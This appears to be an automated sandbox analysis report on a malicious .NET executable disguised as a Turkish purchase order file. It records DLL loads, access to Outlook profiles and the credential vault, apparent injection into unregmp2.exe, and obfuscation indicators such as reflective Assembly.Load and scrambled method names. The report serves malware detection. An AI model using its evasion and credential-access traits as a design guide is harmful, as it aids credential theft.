Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unregmp2.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unregmp2.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unregmp2.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unregmp2.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unregmp2.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unregmp2.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unregmp2.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unregmp2.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unregmp2.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unregmp2.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unregmp2.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unregmp2.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unregmp2.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unregmp2.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unregmp2.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unregmp2.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unregmp2.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unregmp2.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unregmp2.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unregmp2.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unregmp2.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unregmp2.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unregmp2.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\ZbSDFslviKIFedZkSUgKtKQRuMdiZYRzTkQTcBwsci\UQgCFxrqyzfeJVhlwgINlmFOLs.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\ZbSDFslviKIFedZkSUgKtKQRuMdiZYRzTkQTcBwsci\UQgCFxrqyzfeJVhlwgINlmFOLs.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\ZbSDFslviKIFedZkSUgKtKQRuMdiZYRzTkQTcBwsci\UQgCFxrqyzfeJVhlwgINlmFOLs.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\ZbSDFslviKIFedZkSUgKtKQRuMdiZYRzTkQTcBwsci\UQgCFxrqyzfeJVhlwgINlmFOLs.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\ZbSDFslviKIFedZkSUgKtKQRuMdiZYRzTkQTcBwsci\UQgCFxrqyzfeJVhlwgINlmFOLs.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\ZbSDFslviKIFedZkSUgKtKQRuMdiZYRzTkQTcBwsci\UQgCFxrqyzfeJVhlwgINlmFOLs.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\SysWOW64\unregmp2.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: unregmp2.pdb source: Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe, 00000005.00000002.1607512166.0000000000F28000.00000004.00000020.00020000.00000000.sdmp, UQgCFxrqyzfeJVhlwgINlmFOLs.exe, 00000006.00000002.3847213941.0000000001318000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: UQgCFxrqyzfeJVhlwgINlmFOLs.exe, 00000006.00000000.1533882068.00000000004EE000.00000002.00000001.01000000.0000000C.sdmp, UQgCFxrqyzfeJVhlwgINlmFOLs.exe, 0000000B.00000000.1676641682.00000000004EE000.00000002.00000001.01000000.0000000C.sdmp
Source:	Binary string: wntdll.pdbUGP source: Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe, 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, unregmp2.exe, 00000007.00000003.1609720610.0000000004350000.00000004.00000020.00020000.00000000.sdmp, unregmp2.exe, 00000007.00000003.1607430184.0000000000C1A000.00000004.00000020.00020000.00000000.sdmp, unregmp2.exe, 00000007.00000002.3848341578.0000000004500000.00000040.00001000.00020000.00000000.sdmp, unregmp2.exe, 00000007.00000002.3848341578.000000000469E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe, Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe, 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, unregmp2.exe, unregmp2.exe, 00000007.00000003.1609720610.0000000004350000.00000004.00000020.00020000.00000000.sdmp, unregmp2.exe, 00000007.00000003.1607430184.0000000000C1A000.00000004.00000020.00020000.00000000.sdmp, unregmp2.exe, 00000007.00000002.3848341578.0000000004500000.00000040.00001000.00020000.00000000.sdmp, unregmp2.exe, 00000007.00000002.3848341578.000000000469E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: unregmp2.pdbGCTL source: Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe, 00000005.00000002.1607512166.0000000000F28000.00000004.00000020.00020000.00000000.sdmp, UQgCFxrqyzfeJVhlwgINlmFOLs.exe, 00000006.00000002.3847213941.0000000001318000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains potential unpacker

Source: Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe, DemoForm.cs	.Net Code: InitializeComponent
Source: 0.2.Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe.45597a0.3.raw.unpack, zLmOuGeWlNMagjT0Ho.cs	.Net Code: Qg2MCFrZDT System.Reflection.Assembly.Load(byte[])
Source: 0.2.Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe.44d5580.2.raw.unpack, zLmOuGeWlNMagjT0Ho.cs	.Net Code: Qg2MCFrZDT System.Reflection.Assembly.Load(byte[])
Source: 0.2.Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe.5330000.5.raw.unpack, -Module-.cs	.Net Code: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe.5330000.5.raw.unpack, PingPong.cs	.Net Code: _206E_206D_206E_206E_202E_202E_200C_206A_202D_206E_200C_202B_200F_206E_200B_202E_200E_202A_202D_200E_200E_200E_200E_202B_200E_202C_200C_200B_202C_202D_200C_202A_200B_200C_206D_206B_202B_202A_202E_200C_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe.48d0000.4.raw.unpack, zLmOuGeWlNMagjT0Ho.cs	.Net Code: Qg2MCFrZDT System.Reflection.Assembly.Load(byte[])
Source: 0.2.Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe.28fbcc4.0.raw.unpack, -Module-.cs	.Net Code: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe.28fbcc4.0.raw.unpack, PingPong.cs	.Net Code: _206E_206D_206E_206E_202E_202E_200C_206A_202D_206E_200C_202B_200F_206E_200B_202E_200E_202A_202D_200E_200E_200E_200E_202B_200E_202C_200C_200B_202C_202D_200C_202A_200B_200C_206D_206B_202B_202A_202E_200C_202E System.Reflection.Assembly.Load(byte[])
Source: 7.2.unregmp2.exe.4b2cd08.2.raw.unpack, DemoForm.cs	.Net Code: InitializeComponent
Source: 11.2.UQgCFxrqyzfeJVhlwgINlmFOLs.exe.2becd08.1.raw.unpack, DemoForm.cs	.Net Code: InitializeComponent
Source: 11.0.UQgCFxrqyzfeJVhlwgINlmFOLs.exe.2becd08.1.raw.unpack, DemoForm.cs	.Net Code: InitializeComponent

Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 0_2_06C36791 pushad ; retf	0_2_06C367B9
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_00418893 push 00000067h; ret	5_2_00418910
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_00418907 push 00000067h; ret	5_2_00418910
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_004051F1 push es; iretd	5_2_004051F3
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_004052E7 push F2DD9F13h; ret	5_2_004052EC
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_004053C6 push ebx; retf	5_2_004053CA
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_004183DA push 00000018h; ret	5_2_004183DC
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_004084EE push ss; ret	5_2_004084FA
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_00403480 push eax; ret	5_2_00403482
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_00401DA0 push es; retf	5_2_00401DA3
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_00401DA8 push es; retf	5_2_00401DA3
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0041A66B push ecx; ret	5_2_0041A67D
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0041A69C push ecx; ret	5_2_0041A67D
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0040BF29 pushfd ; retf	5_2_0040BF31
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0040A7DF push ds; retf	5_2_0040A7E0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_00407784 push esi; retf	5_2_00407789
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013C09AD push ecx; mov dword ptr [esp], ecx	5_2_013C09B6
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_045027FA pushad ; ret	7_2_045027F9
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_0450225F pushad ; ret	7_2_045027F9
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_0450283D push eax; iretd	7_2_04502858
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_045309AD push ecx; mov dword ptr [esp], ecx	7_2_045309B6
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_00414301 push esi; retf	7_2_00414306
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_00418AA6 pushfd ; retf	7_2_00418AAE
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_00424F57 push 00000018h; ret	7_2_00424F59
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_0041506B push ss; ret	7_2_00415077
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_0042D15E push esp; iretd	7_2_0042D165
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_0042D102 pushfd ; iretd	7_2_0042D103
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_00427130 push ds; retf 7E3Eh	7_2_0042719F
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_004271F3 push ecx; ret	7_2_004271FA
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_00427219 push ecx; ret	7_2_004271FA
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_0041735C push ds; retf	7_2_0041735D

Source: Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe

Static PE information: section name: .text entropy: 7.888152463098512

Source: 0.2.Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe.45597a0.3.raw.unpack, TIrtDirDqJ1OEe3yG9.cs	High entropy of concatenated method names: 'PypFufvmXk', 'DWWFoEK5uA', 'FFCFSRSlTp', 'vRBFeaGJYx', 'ReBFDXZZVJ', 'NDGFnNFsWQ', 'XQIFGDOvei', 'ntSFZrctHJ', 'LiMFk8xVMh', 'tMHF6cXACi'
Source: 0.2.Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe.45597a0.3.raw.unpack, rqgY43I29yopioxdeG.cs	High entropy of concatenated method names: 'PnZ2OZPAFJ', 'zfw2hINOCw', 'i7Z2wxEAGx', 'qYr2tg7tuP', 'bDY2yJYEvv', 'nqy29yFdt2', 'SWL2HBpgYP', 'Lmn21PXtfq', 'aHu2BIfyEV', 'tDG24nliby'
Source: 0.2.Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe.45597a0.3.raw.unpack, U9J4EjoEU9Xe6kLqiP.cs	High entropy of concatenated method names: 'BJgGVUk2be', 'gdVG0kQepZ', 'ToString', 'h5BGjDkb76', 'QEuG279Gy8', 'ArMGFT8XkA', 'O7yGAd8RyK', 'KwNGghhben', 'UJlG7qk9FD', 'c7JGdHQcPM'
Source: 0.2.Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe.45597a0.3.raw.unpack, sXJixuzS3YGNeFsAlV.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'GKnkbK0xiG', 'g2ckDv7EMD', 'aZuknJC0nW', 'VM8kGabfLr', 'pu8kZjmQQb', 'dU2kkNBZye', 'P6ck68XOCX'
Source: 0.2.Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe.45597a0.3.raw.unpack, GAlNoXBqbc1xtX5qdy.cs	High entropy of concatenated method names: 'yY7W7wJAaD', 'r9bWdWvOdq', 'DtqWVHPZCu', 'abrW08Wfnt', 'hkhWDO8UhH', 'FiCWnxAaFM', 'Vt9O3hZ2fZuQcGQRbe', 'OZ0GE0aXeU7nqy10Cp', 'xbuWWqc3Ve', 'BXJWiLPsDv'
Source: 0.2.Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe.45597a0.3.raw.unpack, zPw5rLuMAYeCqU2rNJS.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Xr06Ob0i2K', 'tgG6hvy0ud', 'gsO6w15GUZ', 'rVB6tipsLZ', 'YMf6yNqfEM', 'Q4J69iNRZE', 'TeU6HgCBZF'
Source: 0.2.Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe.45597a0.3.raw.unpack, bDQRot8csROeLadL4C.cs	High entropy of concatenated method names: 'niFkWqGMg8', 'UgokigFeFx', 'UfMkMOSmIM', 'UJqkjyjKee', 'mCwk2AD1SK', 'JmikAVmaq9', 'ulbkgNROQo', 'PtRZHwyCbV', 'E00Z1mIuHp', 'b6uZB8Gqy7'
Source: 0.2.Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe.45597a0.3.raw.unpack, vPql29dODRnLRowy8w.cs	High entropy of concatenated method names: 'DBo7jRBAF4', 'odg7FFODhi', 'MlB7gUDCOt', 'TGAg4wQtdy', 'PvRgzSw7C7', 'jfE73oLcMu', 'xoL7Woxsi5', 'oYP7L8txII', 'gWW7il9Ejo', 'xnY7MKQ8PJ'
Source: 0.2.Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe.45597a0.3.raw.unpack, LoXHfJytBratwc18rV.cs	High entropy of concatenated method names: 'fhgG1j9q3u', 'ioZG4nkVQ1', 'VtAZ3EwA4a', 'vaoZWtkN4j', 'iOXGl7hBos', 'aVEGPK0jRb', 'nIkGmKhUu0', 'RS3GOr05Rk', 'tiMGhIW64A', 'xSeGw8nyBq'
Source: 0.2.Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe.45597a0.3.raw.unpack, tgBpXDFY3ZdZjnatoj.cs	High entropy of concatenated method names: 'RykbS8cEyB', 'v4GbeeB6d0', 'BMIbchkN7K', 'tlbbQ9ugSA', 'h8ibNBtxuU', 'oZqbYiHh3f', 'enHb5o54iV', 'rE0bsvWigG', 'iIsbJClW9E', 'CDVblx1UiG'
Source: 0.2.Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe.45597a0.3.raw.unpack, zLmOuGeWlNMagjT0Ho.cs	High entropy of concatenated method names: 'smVirfWXqD', 'IhMijySULJ', 'YDVi2Zj5NC', 'MLeiFvqAqt', 'zx6iAJ1VWQ', 'dq4igqbLDP', 'ri3i78KubU', 'DA8id9sjUE', 'PFJiR4hnUR', 'fXAiVXsGsr'
Source: 0.2.Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe.45597a0.3.raw.unpack, PkCZU0gs0vLe3cuvBk.cs	High entropy of concatenated method names: 'mrcZjwvp12', 'Tt9Z2dSxy0', 'yxbZF3E9Zq', 'LaFZADxxHE', 'UXqZg13pI9', 'JAUZ7JCNJX', 'qAVZdwLrLB', 'ArCZRFOWfZ', 'TUxZVJQtG9', 'NwAZ0M2JFh'
Source: 0.2.Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe.45597a0.3.raw.unpack, HUOitVGrF2tLZiYvtH.cs	High entropy of concatenated method names: 'rGcgrRZrCR', 'Uewg2tXhvb', 'XxMgA2y0Yj', 'RiPg7dOx9M', 'dmpgdR0W4x', 'kqPAyHfQry', 'cuUA9OaT1U', 'pweAHuPkdj', 'GAKA1B9x6Z', 'nG7ABNFkSB'
Source: 0.2.Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe.45597a0.3.raw.unpack, IgYToyTS2XfjYSU5Ad.cs	High entropy of concatenated method names: 'dqbZcTePFH', 'gLVZQ1T4jt', 'c8aZUEOBfk', 'OmtZNXA4UX', 'PjGZOaRMl6', 'CnwZYaN5dw', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe.45597a0.3.raw.unpack, mGcpHVNvj4jYTR6ee7.cs	High entropy of concatenated method names: 'sgKDJfBngc', 'lq1DPdmTFf', 'PmfDOGHu7A', 'Wu0DholMNv', 'pHwDQ67RWG', 'wEWDUyZyXa', 'FbnDNGRWm8', 'DMpDYaZNHZ', 'IORDTtmnPh', 'unND57vpHQ'
Source: 0.2.Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe.45597a0.3.raw.unpack, NgnGiRxbjmhibcFxdK.cs	High entropy of concatenated method names: 'Dispose', 'ovNWBNMCI5', 'cVELQECccj', 'OpSEEQbZJG', 'S6uW4fVKj5', 'OwgWzmeoUO', 'ProcessDialogKey', 'sZbL37Gacj', 'OR1LWUxBM4', 'ok5LLvctmG'
Source: 0.2.Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe.45597a0.3.raw.unpack, SFM5dcuvFxfBQxWKdsb.cs	High entropy of concatenated method names: 'Dh1kXe1HgD', 'FKxk8Y8wbV', 'P3xkCCBm0g', 'm2ukumjRC4', 'YbJkx8E9S1', 'sNekoRuG5O', 'b98kIoBdb7', 'GCPkSS6tc0', 'FndkekLAnB', 'h7UkfYFfE7'
Source: 0.2.Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe.45597a0.3.raw.unpack, c4PgMshkeuZp3Hk058.cs	High entropy of concatenated method names: 'EvFCRrVcN', 'IQauYIcPg', 'LQRoubh60', 'XxHICJcGb', 'gQJeNNAqq', 'r1CfRIMIY', 'gNTQVlFNjAxyR98UsH', 'TGAgZ1Cd1Tbo9Q3gl6', 'L09ZGZPIW', 'V4w6onsmf'
Source: 0.2.Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe.45597a0.3.raw.unpack, dsj0ng47PhdM71XPPF.cs	High entropy of concatenated method names: 'HB17X0jftp', 'gyE78wJoxA', 'D2s7CnJaOq', 'Pmw7uBBeGf', 'AMr7xOqTYe', 'kIS7oIdqPh', 'Rsm7IJV2AY', 'MmB7Sjosav', 'shq7epY46l', 'L3x7fJrGWF'
Source: 0.2.Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe.44d5580.2.raw.unpack, TIrtDirDqJ1OEe3yG9.cs	High entropy of concatenated method names: 'PypFufvmXk', 'DWWFoEK5uA', 'FFCFSRSlTp', 'vRBFeaGJYx', 'ReBFDXZZVJ', 'NDGFnNFsWQ', 'XQIFGDOvei', 'ntSFZrctHJ', 'LiMFk8xVMh', 'tMHF6cXACi'
Source: 0.2.Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe.44d5580.2.raw.unpack, rqgY43I29yopioxdeG.cs	High entropy of concatenated method names: 'PnZ2OZPAFJ', 'zfw2hINOCw', 'i7Z2wxEAGx', 'qYr2tg7tuP', 'bDY2yJYEvv', 'nqy29yFdt2', 'SWL2HBpgYP', 'Lmn21PXtfq', 'aHu2BIfyEV', 'tDG24nliby'
Source: 0.2.Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe.44d5580.2.raw.unpack, U9J4EjoEU9Xe6kLqiP.cs	High entropy of concatenated method names: 'BJgGVUk2be', 'gdVG0kQepZ', 'ToString', 'h5BGjDkb76', 'QEuG279Gy8', 'ArMGFT8XkA', 'O7yGAd8RyK', 'KwNGghhben', 'UJlG7qk9FD', 'c7JGdHQcPM'
Source: 0.2.Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe.44d5580.2.raw.unpack, sXJixuzS3YGNeFsAlV.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'GKnkbK0xiG', 'g2ckDv7EMD', 'aZuknJC0nW', 'VM8kGabfLr', 'pu8kZjmQQb', 'dU2kkNBZye', 'P6ck68XOCX'
Source: 0.2.Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe.44d5580.2.raw.unpack, GAlNoXBqbc1xtX5qdy.cs	High entropy of concatenated method names: 'yY7W7wJAaD', 'r9bWdWvOdq', 'DtqWVHPZCu', 'abrW08Wfnt', 'hkhWDO8UhH', 'FiCWnxAaFM', 'Vt9O3hZ2fZuQcGQRbe', 'OZ0GE0aXeU7nqy10Cp', 'xbuWWqc3Ve', 'BXJWiLPsDv'
Source: 0.2.Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe.44d5580.2.raw.unpack, zPw5rLuMAYeCqU2rNJS.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Xr06Ob0i2K', 'tgG6hvy0ud', 'gsO6w15GUZ', 'rVB6tipsLZ', 'YMf6yNqfEM', 'Q4J69iNRZE', 'TeU6HgCBZF'
Source: 0.2.Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe.44d5580.2.raw.unpack, bDQRot8csROeLadL4C.cs	High entropy of concatenated method names: 'niFkWqGMg8', 'UgokigFeFx', 'UfMkMOSmIM', 'UJqkjyjKee', 'mCwk2AD1SK', 'JmikAVmaq9', 'ulbkgNROQo', 'PtRZHwyCbV', 'E00Z1mIuHp', 'b6uZB8Gqy7'
Source: 0.2.Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe.44d5580.2.raw.unpack, vPql29dODRnLRowy8w.cs	High entropy of concatenated method names: 'DBo7jRBAF4', 'odg7FFODhi', 'MlB7gUDCOt', 'TGAg4wQtdy', 'PvRgzSw7C7', 'jfE73oLcMu', 'xoL7Woxsi5', 'oYP7L8txII', 'gWW7il9Ejo', 'xnY7MKQ8PJ'
Source: 0.2.Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe.44d5580.2.raw.unpack, LoXHfJytBratwc18rV.cs	High entropy of concatenated method names: 'fhgG1j9q3u', 'ioZG4nkVQ1', 'VtAZ3EwA4a', 'vaoZWtkN4j', 'iOXGl7hBos', 'aVEGPK0jRb', 'nIkGmKhUu0', 'RS3GOr05Rk', 'tiMGhIW64A', 'xSeGw8nyBq'
Source: 0.2.Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe.44d5580.2.raw.unpack, tgBpXDFY3ZdZjnatoj.cs	High entropy of concatenated method names: 'RykbS8cEyB', 'v4GbeeB6d0', 'BMIbchkN7K', 'tlbbQ9ugSA', 'h8ibNBtxuU', 'oZqbYiHh3f', 'enHb5o54iV', 'rE0bsvWigG', 'iIsbJClW9E', 'CDVblx1UiG'
Source: 0.2.Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe.44d5580.2.raw.unpack, zLmOuGeWlNMagjT0Ho.cs	High entropy of concatenated method names: 'smVirfWXqD', 'IhMijySULJ', 'YDVi2Zj5NC', 'MLeiFvqAqt', 'zx6iAJ1VWQ', 'dq4igqbLDP', 'ri3i78KubU', 'DA8id9sjUE', 'PFJiR4hnUR', 'fXAiVXsGsr'
